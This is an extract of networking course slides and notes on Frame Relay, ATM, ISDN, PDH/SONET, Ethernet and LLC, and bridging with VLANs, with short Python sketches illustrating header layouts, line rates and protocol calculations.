ANSI T1.403 (DS1, 1.544 Mbps)
ITU-T V.35
Bit stuffing
Congestion control
Q.922 Annex A and ANSI T1.618 cover the following tasks:
Both describe the multiplexing of different communication channels on one
physical connection with the help of the corresponding DLCI.
Frame alignment, which means start- and end-of-frame detection plus
synchronization with the help of the HDLC flag.
Bit stuffing to prevent the flag bit pattern from appearing inside the payload
area of the frame.
16-bit Cyclic Redundancy Check for error detection inside the Frame Relay
network. Frames in error are simply discarded; no error recovery
functions are implemented.
Determination of maximum and minimum Frame Relay frame sizes depending
on the configuration (e.g. voice).
Congestion control and indication with the help of the FECN and BECN bits or
the CLLM system.
The Frame Relay Frame
Frame layout (field sizes in bytes): Flag (1) | Header (2) | Information | FCS (2) | Flag (1)
Header octet 1: DLCI (MSB, 6 bits) | C/R | EA
Header octet 2: DLCI (LSB, 4 bits) | FECN | BECN | DE | EA
Legend:
DLCI Data Link Connection Identifier
C/R Command/Response
EA Extended Addressing
FECN Forward Explicit Congestion Notification
BECN Backward Explicit Congestion Notification
DE Discard Eligibility
The DLCI field length is typically 10 bits. Optionally, it can be extended using
the EA bit (max 16 bits according to FRF and GoF). The EA bits are used such
that the first and middle address octets are indicated by EA = 0, whereas
the last address octet is indicated by EA = 1.
Note that the second address octet always contains
the FECN, BECN, and DE bits. Currently only 10-bit DLCIs are supported,
but the EA flag allows the use of longer DLCIs in the future. Today, MPLS
utilizes the Extended Address field of the FR header.
The C/R bit is a rudimentary bit, inherited from HDLC. It is not used within
Frame Relay!
According to FRF, the maximum length of the information field is 1600 bytes.
The other standards allow lengths up to 8192 bytes (theoretically), but the CRC-16
only protects 4096 bytes. In practice, maximum frame sizes of up to 1600
bytes are used.
The usage of the FECN and BECN bits is explained in a moment...
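The two-octet header can be packed and unpacked with a few shifts. This sketch follows the header layout above, with EA as the least significant bit of each octet and a 10-bit DLCI split into 6 high-order and 4 low-order bits; longer (extended) headers are not handled, and the function names are hypothetical.

```python
def build_fr_header(dlci, fecn=0, becn=0, de=0, cr=0):
    """Pack a two-octet Frame Relay address field with a 10-bit DLCI."""
    if not 0 <= dlci < 1024:
        raise ValueError("a two-octet header carries a 10-bit DLCI")
    octet1 = ((dlci >> 4) << 2) | (cr << 1) | 0  # 6 DLCI bits, C/R, EA = 0 (more octets follow)
    octet2 = ((dlci & 0x0F) << 4) | (fecn << 3) | (becn << 2) | (de << 1) | 1  # EA = 1: last octet
    return bytes([octet1, octet2])

def parse_fr_header(header):
    """Unpack the fields of a two-octet Frame Relay address field."""
    octet1, octet2 = header[0], header[1]
    return {
        "dlci": ((octet1 >> 2) << 4) | (octet2 >> 4),
        "cr": (octet1 >> 1) & 1,
        "fecn": (octet2 >> 3) & 1,
        "becn": (octet2 >> 2) & 1,
        "de": (octet2 >> 1) & 1,
        "ea": (octet1 & 1, octet2 & 1),
    }

hdr = build_fr_header(100, becn=1)
print(hdr.hex())             # 1845
print(parse_fr_header(hdr))
```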
Congestion Control (1)
FECN indicates congestion to the receiver
BECN indicates congestion to the sender
Problem: DTEs do not need to react (!)
[Figure: a congested switch marks FECN on frames towards the receiver and BECN on frames towards the sender]
The Frame Relay network is able to indicate congestion situations to its users
with the help of the BECN and FECN bits located in the Frame Relay header.
With these two bits not only a congestion situation but also the
direction of the congestion can be indicated. The congested Frame Relay switch
sets the FECN bit in the header of passing frames that travel in the direction of the
congestion, while in the opposite direction the BECN bit
is set.
Congestion Control (2)
Routers can be configured to react
upon receiving a BECN
Only a few higher layer protocols
react upon receiving a FECN
DLCI 1023
Before congestion, DCE sends CLLM
message to DTE
AR > CIR
Sporadic bursts can use line up to AR
Optionally limited by
Excess Information Rate (EIR)
As already discussed before, the main parameters that determine the transport
capacity of a Frame Relay connection are the physical access rate (AR), the CIR and the
Excess Information Rate (EIR).
Typically the CIR is guaranteed by the service provider at any
time. In burst situations the customer may try to send more data than the CIR
allows, but for this additional data the service provider gives no delivery
guarantees.
Most service providers allow overutilization up to the AR; some others may
limit the overutilization with a separate traffic parameter called the EIR.
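CIR and EIR are typically applied per measurement interval Tc: the committed burst is Bc = CIR × Tc and the excess burst is Be = EIR × Tc. The sketch below assumes a common policing scheme in which traffic within Bc is forwarded, traffic between Bc and Bc + Be is forwarded with the DE bit set, and anything beyond is discarded; actual provider behaviour may differ, and the contract values are hypothetical.

```python
def police_interval(frame_bits, cir_bps, eir_bps, tc_ms):
    """Classify the frames offered within one measurement interval Tc."""
    bc = cir_bps * tc_ms // 1000   # committed burst Bc = CIR x Tc (bits)
    be = eir_bps * tc_ms // 1000   # excess burst Be = EIR x Tc (bits)
    accepted, verdicts = 0, []
    for bits in frame_bits:
        if accepted + bits <= bc:
            verdicts.append("commit")   # within the CIR: delivery guaranteed
            accepted += bits
        elif accepted + bits <= bc + be:
            verdicts.append("mark DE")  # forwarded, but discard eligible
            accepted += bits
        else:
            verdicts.append("discard")  # beyond CIR + EIR in this interval
    return verdicts

# Hypothetical contract: CIR 64 kbit/s, EIR 32 kbit/s, Tc = 1 s; ten 1500-byte frames
print(police_interval([12_000] * 10, cir_bps=64_000, eir_bps=32_000, tc_ms=1000))
```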
Bursty Traffic (2)
CIR and EIR are defined via a
measurement interval Tc
User's task
Provider's task
Global Addressing
Status messages
Multicasting
LMI is more of a protocol than an
interface (!)
The Local Management Interface (LMI) is a protocol that runs on a reserved
DLCI to supply you with information about the status of your PVCs.
But it also supports global addressing and the use of multicast PVCs.
LMI Details
Three LMI Types
DLCI 0
FECN, BECN
Frame Relay Forum, ITU-T, and ANSI
Quiz
What's the Tc when using Voice over
Frame Relay?
What's the main difference between
FR and Ethernet when putting IP
on top of them?
What's the typical practical usage of
BECN?
Hints
Q1: Milliseconds (min 10 ms)
Q2: Broadcast medium. Main
problem with routing protocols
Q3: BECN is used by the provider to
throttle the customer if he violates
the traffic contract
ATM Introduction
The Grand Unification
Agenda
What is it? Who wants it? Who did it?
Header and Switching
ATM Layer Hypercube
Adaptation Layers
Signaling
Addresses
What is ATM?
High-Speed Virtual Circuits
No error recovery
UNI and NNI defined
Constant frame sizes: Cells
Based on B-ISDN specifications
Recommendation I.121
To accelerate development
Line coding
Signal conversions
Interface Examples
Standard | Speed (Mbit/s) | Medium | Comments | Encoding | Connector | Usage
SDH STM-1 | 155.52 | Coax | 75 Ohm | CMI | BNC | WAN
PDH E4 | 139.264 | Coax | 75 Ohm | CMI | BNC | WAN
PDH DS3 | 44.736 | Coax | 75 Ohm | B3ZS | BNC | WAN
PDH E3 | 34.368 | Coax | 75 Ohm | HDB3 | BNC | WAN
PDH E2 | 8.448 | Coax | 75 Ohm | HDB3 | BNC | WAN
PDH J2 | 6.312 | TP/Coax | 110/75 Ohm | B6ZS/B8ZS | RJ45/BNC | WAN
PDH E1 | 2.048 | TP/Coax | 120/75 Ohm | HDB3 | 9-pin D/BNC | WAN
PDH DS1 | 1.544 | TP | 100 Ohm | AMI/B8ZS | RJ45/RJ48 | WAN
SDH STM-4 | 622.08 | SM fiber | | SDH | SC | LAN/WAN
SDH STM-1 | 155.52 | SM fiber | | SDH | ST | LAN/WAN
SDH STM-1 | 155.52 | MM fiber | 62.5 µm | SDH | SC | LAN/WAN
SDH STM-4 | 622.08 | SM fiber | | NRZ | SC (ST) | LAN
SDH STM-4 | 622.08 | MM (LED) | | NRZ | SC (ST) | LAN
SDH STM-4 | 622.08 | MM (Laser) | | NRZ | SC (ST) | LAN
SDH STM-1 | 155.52 | UTP5 | 100 Ohm | NRZ | RJ45 | LAN
SDH STM-1 | 155.52 | STP (Type 1) | 150 Ohm | NRZ | 9-pin D | LAN
Fibre Channel | 155.52 | MM fiber | 62.5 µm | 8B/10B | | LAN
TAXI | 100 | MM fiber | 62.5 µm | 4B/5B | MIC | LAN
SONET STS-1 | 51.84 | UTP3 | | NRZ | RJ45 | LAN
ATM 25 | 25.6 | UTP3 | | NRZ | RJ45 | LAN
ATM Layer
Multiplexing and demultiplexing of
cells according to VPI/VCI
Switching of cells
"Label swapping"
Such as IP or IPX
Because of similarity both adaptation
layers were combined to AAL3/4
AAL3/4
Can multiplex different streams of data
on the same ATM connection
Length unnecessary
Convergence Layer:
8 byte trailer in last cell
SAR Layer:
just marks EOM in ATM header (PT)
AAL5 is the most widely used AAL today. UNI signaling, ILMI and PNNI
signaling are also carried over AAL5.
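The 8-byte trailer in the last cell determines how many cells a packet needs: AAL5 pads the payload so that payload, padding and trailer together fill a whole number of 48-byte cell payloads, and each cell adds a 5-byte header on the wire. A short sketch with illustrative helper names:

```python
import math

CELL_PAYLOAD = 48   # bytes of payload per ATM cell
CELL_SIZE = 53      # 48 bytes payload + 5 bytes header
AAL5_TRAILER = 8    # trailer carried at the end of the last cell

def aal5_cells(packet_bytes):
    """Cells needed when the 8-byte trailer must fit into the last cell."""
    return math.ceil((packet_bytes + AAL5_TRAILER) / CELL_PAYLOAD)

def aal5_padding(packet_bytes):
    """Pad bytes inserted before the trailer."""
    return aal5_cells(packet_bytes) * CELL_PAYLOAD - packet_bytes - AAL5_TRAILER

for size in (40, 41, 1500):
    cells = aal5_cells(size)
    print(size, cells, aal5_padding(size), cells * CELL_SIZE)
# 40 1 0 53
# 41 2 47 106
# 1500 32 28 1696
```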
Packets and Cell Loss (2)
Cells of damaged packets are still
forwarded by ATM switches
Constant delays
Constant bandwidth
Dynamic connection establishment
User initiated
Temporarily
ISDN specifies only a User-to-Network Interface (UNI), quite similar to X.25
and Frame Relay. But the main difference is that ISDN relies on deterministic,
synchronized multiplexing.
Two interfaces were defined: the Basic Rate Interface (BRI) and the Primary
Rate Interface (PRI). Both are explained on the next pages in more detail.
Synchronous and deterministic multiplexing provides constant delays and
bandwidth. Therefore, a user is able to put any type of traffic on top of this layer;
it works fully transparently!
The connections are established dynamically by a signaling protocol. The user
dials a number and a temporary connection is created. The signaling protocol is
the famous "Q.931". It is explained later, but you should try to memorize it
already now.
Basic Rate Interface (BRI)
2 Bearer (B) channels with 64 kbit/s
each
1 Data (D) channel with 16 kbit/s
Supplementary services
Reverse charging
Hunt groups
etc...
The CCITT (today known as ITU-T) defined three services for ISDN.
Bearer services define the transport of information in real time without alteration of
the message content. Both circuit mode and packet mode (virtual call and
permanent virtual circuit) are supported.
Teleservices combine the transport function with information-processing
functions, e.g. telephony, teletex, telefax, videotex, and telex.
Supplementary services can be used to enhance bearer services or teleservices.
Examples of supplementary services are reverse charging, closed user group, line
hunting, call forwarding, calling line identification, multiple subscriber number
(MSN), and subaddressing.
Functional Groups
Terminal Equipment (TE)
Point-to-point
Maximum distance between TE and NT is
1 km (!)
Requires a PBX
Multipoint
Up to 8 TEs can share the bus
Maximum distance between TE and NT is
200 meters (short bus) or 500 meters
(extended bus)
An ISDN interface can be configured either in multipoint mode or in
point-to-point mode.
The point-to-point mode is the normal connection mode for business ISDN users.
The user can attach only one single device to the ISDN connection, which
has to handle all calls (typically a PBX is used).
The ISDN provider assigns a range of numbers to the ISDN connection. Any
call within this number range is sent to the user. The ISDN provider
leaves the assignment of the last digits of the telephone number to the ISDN user. This
setup usually allows for additional features, but is also more expensive.
Multipoint Configuration
D channel is shared by all TEs
Contention mode
B channels are dynamically assigned
to TEs
Bit-stuffing
30 B channels
1 Framing Channel
USA: T1
23 B channels
1 D channel
The T1 frame synchronization is achieved using a single bit at the beginning of the
frame. Both E1 and T1 are explained in another module (Telco Backbones).
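The single framing bit explains the characteristic T1 line rate. The following minimal Python sketch assumes the usual 8000 frames per second (one frame per 125 microsecond sampling interval) and 8-bit samples per channel; the constant and function names are illustrative only.

```python
# T1 frame: 24 channels x 8 bits + 1 framing bit, sent 8000 times per second.
CHANNELS = 24
BITS_PER_SAMPLE = 8
FRAMING_BITS = 1
FRAMES_PER_SECOND = 8000


def t1_bits_per_frame() -> int:
    """Bits in one T1 frame: all channel samples plus the single framing bit."""
    return CHANNELS * BITS_PER_SAMPLE + FRAMING_BITS


def t1_line_rate() -> int:
    """T1 line rate in bit/s."""
    return t1_bits_per_frame() * FRAMES_PER_SECOND


if __name__ == "__main__":
    print(t1_bits_per_frame(), "bits per frame")  # 193 bits per frame
    print(t1_line_rate(), "bit/s")                # 1544000 bit/s
```

The framing bit alone costs 8 kbit/s of the 1.544 Mbit/s line rate.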
LAPD (Q.921)
Link Access Procedure D-Channel
By switch (ET)
"Identifies payload"
0 signaling information (s-type)
16 packet data (p-type)
63 management information
Additionally, a Service Access Point Identifier (SAPI) is needed to identify the
content of this LAPD frame. Each SAPI number identifies a layer 3 service. For
example, Q.931 services might be addressed, or the SAPI might indicate that
the LAPD payload is an X.25 data frame.
TEI Management Messages
UI frames with SAPI = 63 and TEI = 127
Information field contains
Message type
Management messages are also identified by a special SAPI (63), combined with a
TEI of 127, which addresses all TEs (broadcast). These management messages are
used to assign TEIs to the TEs.
Examples of message types are:
ID Request, ID Check Response, ID Verify (TE to NT) and
ID Assigned, ID Denied, ID Check Request, ID Remove (NT to TE)
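To make the SAPI/TEI combination concrete, here is a minimal Python sketch that decodes the two-octet LAPD address field, assuming the standard Q.921 layout (octet 1: 6-bit SAPI, C/R bit, EA bit = 0; octet 2: 7-bit TEI, EA bit = 1). The function name and the dictionary keys are hypothetical; the SAPI meanings are taken from the slide above.

```python
# SAPI values listed on the LAPD slide.
SAPI_MEANING = {
    0: "signaling information (s-type, Q.931)",
    16: "packet data (p-type, X.25)",
    63: "management information (TEI management)",
}


def decode_lapd_address(octet1: int, octet2: int) -> dict:
    """Decode the two-octet LAPD (Q.921) address field.

    Octet 1: SAPI (6 bits) | C/R (1 bit) | EA = 0
    Octet 2: TEI  (7 bits) | EA = 1
    """
    if (octet1 & 0x01) != 0 or (octet2 & 0x01) != 1:
        raise ValueError("unexpected address extension (EA) bits")
    sapi = octet1 >> 2
    return {
        "sapi": sapi,
        "cr": (octet1 >> 1) & 0x01,  # command/response bit
        "tei": octet2 >> 1,          # 127 = broadcast to all TEs
        "meaning": SAPI_MEANING.get(sapi, "other"),
    }


# TEI management frame: SAPI 63, TEI 127 (broadcast to all TEs).
print(decode_lapd_address(0xFC, 0xFF))
```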
Q.931
Carries signaling information
Call control
Terminated by ET
ET is a real 7-layer gateway
Shannon
Jitter
Companding laws
Digital Hierarchies
PDH
SONET/SDH
This chapter gives an introduction to the complex world of Telco technologies.
First we discuss transmission basics related to voice and scalability issues.
In order to understand these technologies it is important to know about Shannon's
laws, jitter problems, signal-to-noise problems, and digital hierarchy concepts.
After these basic sections this chapter presents two important Telco backbone
technologies, PDH and SONET/SDH.
Long History
Origins in late 19th century
Voice was/is the yardstick
Same terms
Over decades
World-wide!
Availability
Remote control
Telemetry
Realtime traffic does not necessarily require "fast" transmission. It only demands
"fast enough" transmission. That is, a bounded delay is defined within which all
required data must be received.
Solutions
Isochronous network
ISDN PRI
Leased line
In the middle of the 20th century, the telephony network infrastructure was still
analog and very complex. Each connection was realized by a dedicated bundle of
wires, and all of them terminated in the central office. Signaling was slow and
primitive, and switching was a time-consuming process. Furthermore, speech quality
degraded on long-haul connections.
In the 1960s digital backbones were created, and also digital signaling protocols
such as SS#7. Central office equipment became smaller and more efficient, and
the number of wires was reduced drastically. This technology was called
Plesiochronous Digital Hierarchy (PDH) and is based on synchronous TDM;
however, it was not fully synchronous because of the technical restrictions of
those days. PDH is still important and used today.
Why Plesiochronous?
1960s technology: No buffering of frames at high speeds possible
Goal: Fast delivery, very short delays (voice!)
Grooming required
Now we know the meaning of the term "plesiochronous". But what is meant by
the term "hierarchy" in this context? Obviously Telcos were supposed to supply
millions of users with a dial tone. Which topology would be most efficient? Only
a star topology can efficiently cover whole villages, cities, and even countries. A
star consists of many point-to-point connections: each spoke is connected to a hub.
The hub is called the "Central Office" (CO) and the spokes are either telephones
or multiplexers.
Traffic always concentrates at the hubs but is also distributed from the hubs. The
hubs are interconnected by PDH trunks. Many trunks constitute spokes and are
again concentrated in another (higher-level) hub. This principle is applied
recursively, forming a so-called Digital Hierarchy. If you go deeper into this
hierarchy you will see higher data rates.
The backbone itself consists of point-to-point or ring topologies. Rings have the
advantage of providing one redundant connection between any two nodes.
Of course the number of links is much lower in the heart of the hierarchy
(therefore the data rate is much higher). Hubs are responsible for collecting all user
signals that are destined to the same direction and putting them onto the same trunk.
This process is called "grooming".
Digital Hierarchy of Multiplexers
Example: European PDH
64 kbit/s
E1 = 30 x 64 kbit/s + Overhead
E2 = 4 x 30 x 64 kbit/s + Overhead
E3 = 4 x 4 x 30 x 64 kbit/s + Overhead
E4 = 4 x 4 x 4 x 30 x 64 kbit/s + Overhead
The picture above shows the digital multiplexing hierarchy used in European PDH
networks. The lowest level uses so-called "E1" frames, consisting of 30 user
signals. At each multiplexing level four lower-rate channels are combined into
one higher-rate channel. This way "E2", "E3", and "E4" are formed.
Higher multiplexing levels have also been defined, for example "E5", but they are
rarely used.
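The "+ Overhead" terms can be quantified by comparing the carried 64 kbit/s user channels with the nominal line rates. The sketch below assumes the nominal European PDH rates from ITU-T G.702 (2048, 8448, 34368, and 139264 kbit/s); the function names are hypothetical. For E1 the overhead is exactly two 64 kbit/s timeslots (timeslot 0 for framing, timeslot 16 for signaling), and the overhead share grows with each level.

```python
# Nominal line rates of the European PDH levels in kbit/s (ITU-T G.702).
NOMINAL_RATE_KBPS = {1: 2048, 2: 8448, 3: 34368, 4: 139264}


def payload_kbps(level: int) -> int:
    """User payload of level E<level>: 30 x 64 kbit/s, times 4 per level above E1."""
    return 30 * 64 * 4 ** (level - 1)


def overhead_kbps(level: int) -> int:
    """Difference between nominal line rate and the carried 64 kbit/s user channels."""
    return NOMINAL_RATE_KBPS[level] - payload_kbps(level)


for level in range(1, 5):
    print(f"E{level}: payload {payload_kbps(level)} kbit/s, "
          f"line rate {NOMINAL_RATE_KBPS[level]} kbit/s, "
          f"overhead {overhead_kbps(level)} kbit/s")
```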
Digital Signal Levels
Differentiate:
12 T1 frames (D4)
Increasing overhead
Physical Layer
Section (Regenerator Section) Layer
Consists of 4 x OC-3c channels
Uni-directional routing
2 channels occupied
Figure: ADM 2, Drop & Continue
The picture above illustrates the capabilities of ADMs.
Uni- and Bi-directional Routing
Figure: ring of ADM 1 to ADM 4, shown twice: uni-directional routing and bi-directional routing
The picture above illustrates the capabilities of ADMs together with unidirectional
and bidirectional routing.
Operations
Protection
Serial Line IP
Predecessor of PPP
IP uses "IPCP"
Typical tasks
2.94 Mbit/s
Original Ethernet Frame (field sizes in bits):
1 | Destination Address: 8 | Source Address: 8 | Data: about 4000 | CRC: 16
The Aloha protocol was fairly simple: send whenever you like, but wait for an
acknowledgement. If there is no acknowledgement, a collision is assumed
and the station has to retransmit after a random time. "Pure Aloha" achieved a
maximum channel utilization of 18 percent. "Slotted Aloha" used a centralized
clock to divide time into slots, and stations were only allowed to start sending at
the beginning of a slot, thereby increasing the maximum utilization to about
37 percent. Robert Metcalfe perceived the problem: another backoff algorithm was
needed, but also "listen before talk".
Metcalfe created Carrier Sense Multiple Access with Collision Detection
(CSMA/CD) and a truncated exponential backoff algorithm which allows a
channel load of close to 100 percent.
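The 18 and 37 percent figures follow from the classic throughput formulas S = G e^(-2G) for pure Aloha and S = G e^(-G) for slotted Aloha, where G is the offered load in frames per frame time. The minimal Python sketch below evaluates both at their maxima and adds the truncated binary exponential backoff as specified for IEEE 802.3 (after the n-th collision wait a random number of slot times between 0 and 2^min(n, 10) - 1, give up after 16 attempts). Function names are illustrative only.

```python
import math
import random


def pure_aloha_throughput(g: float) -> float:
    """Throughput S for offered load G (frames per frame time): S = G * e^(-2G)."""
    return g * math.exp(-2 * g)


def slotted_aloha_throughput(g: float) -> float:
    """Throughput S for offered load G: S = G * e^(-G)."""
    return g * math.exp(-g)


def backoff_slots(collisions: int, rng: random.Random) -> int:
    """Truncated binary exponential backoff (IEEE 802.3 style).

    After the n-th collision wait k slot times, k uniform in [0, 2^min(n, 10) - 1].
    After 16 collisions the frame is discarded.
    """
    if collisions >= 16:
        raise RuntimeError("excessive collisions: frame discarded")
    k_max = 2 ** min(collisions, 10) - 1
    return rng.randint(0, k_max)


print(round(pure_aloha_throughput(0.5), 3))     # 0.184 (maximum at G = 0.5)
print(round(slotted_aloha_throughput(1.0), 3))  # 0.368 (maximum at G = 1)
print(backoff_slots(3, random.Random(42)))      # some value between 0 and 7
```

Truncating the exponent at 10 bounds the waiting time, while the growing random range spreads retransmissions out as the load increases.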
Robert Metcalfe's first Ethernet system used a transmission rate of 2.94 Mbit/s,
which was the system clock of the Xerox Alto workstations at that time.
Originally, in 1972, Metcalfe called his system "Alto Aloha Network", but one
year later he renamed it "Ethernet" in order to emphasize that this
networking system could support any computer, not just Altos, and of course
to clarify the difference from traditional Aloha!
History (2)
1976: Robert Metcalfe released the famous paper:
"Ethernet: Distributed Packet Switching for Local Computer Networks"
Original sketch
The press has often stated that Ethernet was invented on May 22, 1973, when
Robert Metcalfe wrote a memo to his bosses describing Ethernet's potential,
but Metcalfe claims Ethernet was actually invented very gradually over a period
of several years. In 1976, Robert Metcalfe and David Boggs (Metcalfe's
assistant) published a paper titled "Ethernet: Distributed Packet-Switching
For Local Computer Networks."
Metcalfe left Xerox in 1979 to promote the use of personal computers and local
area networks (LANs). He successfully convinced Digital Equipment, Intel,
and Xerox Corporations to work together to promote Ethernet as a standard.
Now an international computer industry standard, Ethernet is the most widely
installed LAN protocol.
History (3)
1978: Patent for Ethernet-Repeater
1980: DEC, Intel, Xerox (DIX) published the 10 Mbit/s Ethernet standard
Improvement of ALOHA
Frame is discarded
HDLC heritage
Basic frame format of every IEEE protocol:
MAC Header | DSAP | SSAP | Ctrl | data | MAC Trailer
(DSAP, SSAP, and Ctrl form the layer 2 LLC header)
DSAP: Which is my destination layer?
SSAP: Which is my source layer?
Ctrl: HDLC functionality
The LLC (802.2) is part of every basic frame format that is specified by the
IEEE, e.g. Token Ring, Token Bus, Ethernet, etc.
The DSAP and SSAP fields are both eight bits in length and are used to address
layer 3 processes. The SSAP specifies the layer 2-3 interface used at the source,
while the DSAP specifies the layer 2-3 interface at the destination.
In practice the SSAP value is almost always the same as the DSAP value,
because only layer 3 processes of the same kind are able to communicate
with each other. So IP-to-IP communication would use an SSAP and DSAP
value of 0x06.
The Control field inside the LLC can be used for connection-oriented or
connectionless communication, and it works basically the same way as in HDLC.
LLC Details
Depending on the HDLC functionality supported, 4 LLC classes are defined
0xAA: SNAP
0xE0: Novell
0xF0: NetBIOS
Figure: LLC header fields DSAP, SSAP, and Ctrl
DSAP bits: I/G (Individual or Group), U (User: IEEE or Vendor); 63 IEEE defined, 63 vendor defined
SSAP bits: C/R (Command or Response), U (User: IEEE or Vendor); 63 IEEE defined, 63 vendor defined
The DSAP and the SSAP are both 8 bits in length. The least significant bit in
the DSAP indicates whether it is an individual or a group access
point. In the SSAP this bit is the command/response bit and is not used in
Ethernet systems. The U bit specifies whether it is an IEEE-defined or a
vendor-specific access point.
Hex E0 .......... Novell (U=0)
Hex Fy .......... reserved for IBM (U=0)
Hex F0 .......... NetBIOS (U=0)
Hex F4 .......... IBM LAN manager individual (U=0)
Hex F5 .......... IBM LAN manager group (U=0, I/G=1)
Hex F8 .......... remote program load (U=0)
Hex 04 .......... SNA path control individual (U=0)
Hex 05 .......... SNA path control group (U=0, I/G=1)
The range Hex 8y to 9C (with U=0) is reserved for free usage, except where y = xx1x (binary notation), i.e. U=1.
Hex 00 .......... Null SAP
A station with running LLC software always responds to a frame destined to the Null SAP; hence an LLC ping can be
implemented.
Hex 03 .......... LLC sub-layer management (U=1)
Hex 06 .......... DoD IP (U=1)
Hex 42 .......... 802.1d Spanning Tree Protocol (U=1)
Hex AA .......... TCP/IP SNAP (U=1)
Hex FE .......... ISO Network Layer (U=1)
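The DSAP/SSAP rules above can be sketched as a small Python parser. It is a minimal illustration, assuming a one-octet control field (as for unnumbered frames such as UI = 0x03; I and S frames use two octets) and using the bit interpretation of the list above (least significant bit = I/G or C/R, next bit = U). The function name, dictionary keys, and the reduced SAP table are hypothetical.

```python
# A few SAP values from the list above.
KNOWN_SAPS = {
    0x00: "Null SAP",
    0x03: "LLC sub-layer management",
    0x04: "SNA path control individual",
    0x06: "DoD IP",
    0x42: "802.1d Spanning Tree Protocol",
    0xAA: "TCP/IP SNAP",
    0xE0: "Novell",
    0xF0: "NetBIOS",
    0xFE: "ISO Network Layer",
}


def parse_llc(header: bytes) -> dict:
    """Split DSAP, SSAP, and a one-octet control field of an 802.2 LLC header."""
    if len(header) < 3:
        raise ValueError("LLC header needs at least 3 octets")
    dsap, ssap, control = header[0], header[1], header[2]
    return {
        "dsap": dsap,
        "ssap": ssap,
        "dsap_group": bool(dsap & 0x01),     # I/G bit: 1 = group SAP
        "ssap_response": bool(ssap & 0x01),  # C/R bit: 1 = response
        "ieee_defined": bool(dsap & 0x02),   # U bit as used in the list above
        "protocol": KNOWN_SAPS.get(dsap, "unknown"),
        "control": control,
    }


# Spanning Tree BPDU: DSAP = SSAP = 0x42, UI frame (control 0x03).
print(parse_llc(bytes([0x42, 0x42, 0x03])))
```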
DIX Type field
2-byte Type field to identify payload
(protocols carried)
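The DIX Type field and the IEEE 802.3 Length field occupy the same two bytes after the source MAC address, so a receiver must tell them apart by value: values of 0x0600 (1536) and above are types, values up to 1500 are lengths followed by an LLC header. A minimal Python sketch, with hypothetical function and constant names, assuming the frame starts at the destination MAC address:

```python
ETHERTYPE_MIN = 0x0600  # 1536: smallest value interpreted as a DIX type
MAX_8023_LENGTH = 1500  # largest valid IEEE 802.3 length value


def classify_frame(frame: bytes) -> str:
    """Look at the 2-byte field after destination and source MAC (bytes 12-13)."""
    if len(frame) < 14:
        raise ValueError("frame shorter than an Ethernet header")
    value = int.from_bytes(frame[12:14], "big")
    if value >= ETHERTYPE_MIN:
        return f"DIX (Ethernet II), type 0x{value:04X}"
    if value <= MAX_8023_LENGTH:
        return f"IEEE 802.3, length {value}, LLC header follows"
    return "undefined"  # 1501..1535 is neither a valid length nor a type


print(classify_frame(bytes(12) + b"\x08\x00"))             # DIX (Ethernet II), type 0x0800
print(classify_frame(bytes(12) + (46).to_bytes(2, "big")))  # IEEE 802.3, length 46, LLC header follows
```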
Cat 4
Cat 5
Cat 6
Cat 7
Category depends on twisting cycles
per length unit, insulation, and shielding
The cable types used in networking are divided into different categories which
determine the capability of a cable, e.g. maximum frequency, impedance,
attenuation, crosstalk, etc.
CAT 3, 4, 5, 5e, and 6 are specified by the TIA/EIA-568-B standard published by
the Electronic Industries Alliance and the Telecommunications Industry Association
(EIA/TIA).
CAT 7 cables are not covered by this standard; they are specified by
ISO/IEC 11801 (Class F) for frequencies of up to 600 MHz.
CAT 3 ...... 16 MHz
CAT 4 ...... 20 MHz
CAT 5 ...... 100 MHz
CAT 5e ..... 100 MHz
CAT 6 ...... 250 MHz
The Category 5e (CAT5e), or Enhanced Category 5, was ratified in 1999. It is
an incremental improvement designed to enable cabling to support full-duplex
Fast Ethernet operation and Gigabit Ethernet.
Like CAT5, CAT5e is a 100 MHz standard, but it has stricter specifications for
crosstalk, attenuation, and return loss.
Typical NIC Design
Figure: Computer I/O Bus and MAC, followed either by an internal transceiver (PHY, MDI, RJ45 connector) or by an external transceiver attached via AUI/MII/GMII cable (PHY, MDI, e.g. 100BaseFX transceiver with fiber MC connector)
AUI Attachment Unit Interface
MII Media Independent Interface
GMII Gigabit MII
MDI Medium Dependent Interface
PHY Physical Layer Device
MAC Media Access Control Unit
This graphic shows the principal design of a network interface card.
The MAC layer is located directly on the Ethernet card and is
responsible for the interaction between the physical layer and the data link layer.
There is also a physical interface located directly on the Ethernet card itself,
equipped with an RJ45 connector.
The AUI/MII/GMII connector represents a bus system for 10/100/1000 Mbit/s
Ethernet systems, used for media conversion with the help of a transceiver.
Summary
Successful because simple
Two frames: DIX (Ethernet II) and IEEE (802.3)
Shared medium has consequences
Half/full-duplex?
Collision behavior?
What is the canonical addressing format?
What is a jam signal?
What are 802.3u and 802.3z?
What is a runt? What is the opposite?
Transparent Bridging
and VLAN
Plug and Play Networking
I think that I shall never see
a graph more lovely than a tree
a graph whose crucial property
is loop-free connectivity.
A tree which must be sure to span
so packets can reach every lan.
first the root must be selected
by ID it is elected.
least cost paths to root are traced,
and in the tree these paths are placed.
mesh is made by folks like me,
bridges find a spanning tree.
Algorhyme
Radia Perlman
Radia Perlman: PhD computer science 1988, MIT; MS math 1976, MIT; BA
math 1973, MIT
Radia Perlman specializes in network and security protocols. She is the
inventor of the spanning tree algorithm used by bridges, and of the mechanisms
that make modern link state protocols efficient and robust. She is the author of
two textbooks.
Her thesis on routing in the presence of malicious failures remains the most
important work in routing security. She has made contributions in diverse areas
of network security, such as credentials download, strong password protocols,
analysis and redesign of IPsec's IKE protocols, PKI models, efficient certificate
revocation, and distributed authorization. In routing, her contributions include
making link state protocols robust and scalable, simplifying the IP multicast
model, and routing with policies.
Bridge History
Bridges came after routers!
First bridge designed by Radia Perlman
Forwarding of frames
Forwarding of packets
Multiple ports
Improved functionality
Don't confuse it with WAN Switching!
Completely different!
Broadcast storms
Endless cycling
Protocol based
ISL (Cisco)
There are different ways to assign hosts (users) to VLANs. The most common
is port-based assignment, meaning that each port has been configured to be a
member of a VLAN. Simply attach a host there and its user belongs to the
specified VLAN.
Hosts can also be assigned to VLANs by their MAC address. Also, specific
protocols can be assigned to dedicated VLANs, for example management
traffic. Furthermore, some devices allow complex rules to be defined for
VLAN assignment, for example a combination of address, protocol, etc.
Of course VLANs should span several bridges. This is supported by
special VLAN trunking protocols, which are only used on the trunk between
two switches. Two important protocols are commonly used: the IEEE 802.1q
protocol and the Cisco Inter-Switch Link (ISL) protocol. Both protocols
basically attach a "tag" to each frame which is sent over the trunk.
